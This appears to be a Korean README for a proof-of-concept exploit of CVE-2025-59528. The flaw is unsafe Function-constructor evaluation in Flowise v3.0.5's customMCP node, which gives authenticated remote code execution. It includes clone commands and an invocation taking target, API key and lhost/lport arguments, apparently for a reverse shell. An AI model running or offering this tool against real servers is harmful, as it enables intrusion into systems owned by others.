
CVE-2025-59528 개념 증명
이 저장소는 Flowise v3.0.5에서 CVE-2025-59528을 입증하는 개념 증명(PoC)을 포함합니다.
이 취약점은 customMCP 노드에 존재하며, 사용자가 제공한 mcpServerConfig 입력이 Function 생성자를 사용한 안전하지 않은 평가를 통해 JavaScript 코드 실행으로 이어지는 방식으로 처리됩니다.
| 영향받는 버전 | 수정된 버전 |
|---|---|
| 3.0.5 | 3.0.6 |
인증된 사용자는 서버에서 임의의 JavaScript를 실행할 수 있으며, 잠재적으로 원격 코드 실행으로 이어질 수 있습니다.
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

이 도구는 교육 및 연구 목적으로만 제공됩니다. 제작자는 이 도구의 오용이나 이로 인해 발생하는 피해에 대해 어떠한 책임도 지지 않습니다.